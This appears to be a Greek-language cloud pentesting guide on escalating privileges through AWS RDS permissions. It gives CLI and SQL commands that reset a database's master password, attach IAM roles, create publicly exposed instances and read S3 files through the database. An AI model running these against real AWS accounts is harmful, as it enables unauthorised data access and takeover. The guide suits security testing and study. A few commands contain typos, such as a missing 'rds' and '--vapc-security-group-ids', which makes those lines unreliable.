AWS - RDS Privesc

RDS - Υπηρεσία Σχεσιακής Βάσης Δεδομένων

Για περισσότερες πληροφορίες σχετικά με το RDS ελέγξτε:

rds:ModifyDBInstance

Με αυτή την άδεια, ένας επιτιθέμενος μπορεί να τροποποιήσει τον κωδικό πρόσβασης του κύριου χρήστη, και την είσοδο μέσα στη βάση δεδομένων:

# Get the DB username, db name and address
aws rds describe-db-instances

# Modify the password and wait a couple of minutes
aws rds modify-db-instance \
--db-instance-identifier <db-id> \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>

Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στις βάσεις δεδομένων.

rds-db:connect

Σύμφωνα με τα έγγραφα, ένας χρήστης με αυτή την άδεια θα μπορούσε να συνδεθεί στην DB instance.

Κατάχρηση δικαιωμάτων IAM ρόλου RDS

Postgresql (Aurora)

Αρχικά μπορείτε να ελέγξετε αν αυτή η βάση δεδομένων έχει χρησιμοποιηθεί για πρόσβαση σε οποιαδήποτε άλλη υπηρεσία AWS. Μπορείτε να το ελέγξετε κοιτάζοντας τις εγκατεστημένες επεκτάσεις:

SELECT * FROM pg_extension;

Αν βρείτε κάτι όπως aws_s3 μπορείτε να υποθέσετε ότι αυτή η βάση δεδομένων έχει κάποιο είδος πρόσβασης στο S3 (υπάρχουν άλλες επεκτάσεις όπως aws_ml και aws_lambda).

Επίσης, αν έχετε άδειες να εκτελέσετε aws rds describe-db-clusters μπορείτε να δείτε εκεί αν το cluster έχει οποιοδήποτε IAM Role συσχετισμένο στο πεδίο AssociatedRoles. Αν υπάρχει, μπορείτε να υποθέσετε ότι η βάση δεδομένων ήταν έτοιμη να έχει πρόσβαση σε άλλες υπηρεσίες AWS. Βασισμένοι στο όνομα του ρόλου (ή αν μπορείτε να αποκτήσετε τις άδειες του ρόλου) θα μπορούσατε να μαντέψετε ποια επιπλέον πρόσβαση έχει η βάση δεδομένων.

Τώρα, για να διαβάσετε ένα αρχείο μέσα σε ένα bucket πρέπει να γνωρίζετε την πλήρη διαδρομή. Μπορείτε να το διαβάσετε με:

// Create table
CREATE TABLE ttemp (col TEXT);

// Create s3 uri
SELECT aws_commons.create_s3_uri(
'test1234567890678', // Name of the bucket
'data.csv',          // Name of the file
'eu-west-1'          //region of the bucket
) AS s3_uri \gset

// Load file contents in table
SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri');

// Get info
SELECT * from ttemp;

// Delete table
DROP TABLE ttemp;

Αν είχατε raw AWS credentials θα μπορούσατε επίσης να τα χρησιμοποιήσετε για να αποκτήσετε πρόσβαση σε δεδομένα S3 με:

SELECT aws_s3.table_import_from_s3(
't', '', '(format csv)',
:'s3_uri',
aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
);

Mysql (Aurora)

Μέσα στο mysql εκτελέστε show variables; και αν οι μεταβλητές όπως aws_default_s3_role, aurora_load_from_s3_role, aurora_select_into_s3_role, έχουν τιμές, μπορείτε να υποθέσετε ότι η βάση δεδομένων είναι προετοιμασμένη να έχει πρόσβαση σε δεδομένα S3.

Επίσης, αν έχετε δικαιώματα να εκτελέσετε aws rds describe-db-clusters μπορείτε να ελέγξετε αν το cluster έχει κάποια συσχετισμένη ρόλο, που συνήθως σημαίνει πρόσβαση σε υπηρεσίες AWS).

Τώρα, για να διαβάσετε ένα αρχείο μέσα σε ένα bucket πρέπει να γνωρίζετε την πλήρη διαδρομή. Μπορείτε να το διαβάσετε με:

CREATE TABLE ttemp (col TEXT);
LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
SELECT * FROM ttemp;
DROP TABLE ttemp;

rds:AddRoleToDBCluster, iam:PassRole

Ένας επιτιθέμενος με τις άδειες rds:AddRoleToDBCluster και iam:PassRole μπορεί να προσθέσει έναν καθορισμένο ρόλο σε μια υπάρχουσα RDS παρουσία. Αυτό θα μπορούσε να επιτρέψει στον επιτιθέμενο να έχει πρόσβαση σε ευαίσθητα δεδομένα ή να τροποποιήσει τα δεδομένα εντός της παρουσίας.

aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>

Πιθανές Επιπτώσεις: Πρόσβαση σε ευαίσθητα δεδομένα ή μη εξουσιοδοτημένες τροποποιήσεις στα δεδομένα της RDS παρουσίας. Σημειώστε ότι ορισμένες βάσεις δεδομένων απαιτούν επιπλέον ρυθμίσεις όπως το Mysql, το οποίο χρειάζεται να καθορίσει το ρόλο ARN στις ομάδες παραμέτρων επίσης.

rds:CreateDBInstance

Μόνο με αυτή την άδεια, ένας επιτιθέμενος θα μπορούσε να δημιουργήσει μια νέα παρουσία μέσα σε ένα κλάστερ που ήδη υπάρχει και έχει συνημμένο ένα ρόλο IAM. Δεν θα μπορεί να αλλάξει τον κωδικό πρόσβασης του κύριου χρήστη, αλλά μπορεί να είναι σε θέση να εκθέσει τη νέα βάση δεδομένων στο διαδίκτυο:

aws --region eu-west-1 --profile none-priv rds create-db-instance \
--db-instance-identifier mydbinstance2 \
--db-instance-class db.t3.medium \
--engine aurora-postgresql \
--db-cluster-identifier database-1 \
--db-security-groups "string" \
--publicly-accessible

rds:CreateDBInstance, iam:PassRole

Ένας επιτιθέμενος με τις άδειες rds:CreateDBInstance και iam:PassRole μπορεί να δημιουργήσει μια νέα RDS instance με έναν καθορισμένο ρόλο συνημμένο. Ο επιτιθέμενος μπορεί στη συνέχεια να αποκτήσει πρόσβαση σε ευαίσθητα δεδομένα ή να τροποποιήσει τα δεδομένα εντός της instance.

aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole

Πιθανές Επιπτώσεις: Πρόσβαση σε ευαίσθητα δεδομένα ή μη εξουσιοδοτημένες τροποποιήσεις στα δεδομένα της RDS παρουσίας.

rds:AddRoleToDBInstance, iam:PassRole

Ένας επιτιθέμενος με τις άδειες rds:AddRoleToDBInstance και iam:PassRole μπορεί να προσθέσει έναν καθορισμένο ρόλο σε μια υπάρχουσα RDS παρουσία. Αυτό θα μπορούσε να επιτρέψει στον επιτιθέμενο να πρόσβαση σε ευαίσθητα δεδομένα ή να τροποποιήσει τα δεδομένα εντός της παρουσίας.

aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>

Πιθανές Επιπτώσεις: Πρόσβαση σε ευαίσθητα δεδομένα ή μη εξουσιοδοτημένες τροποποιήσεις στα δεδομένα στην RDS instance.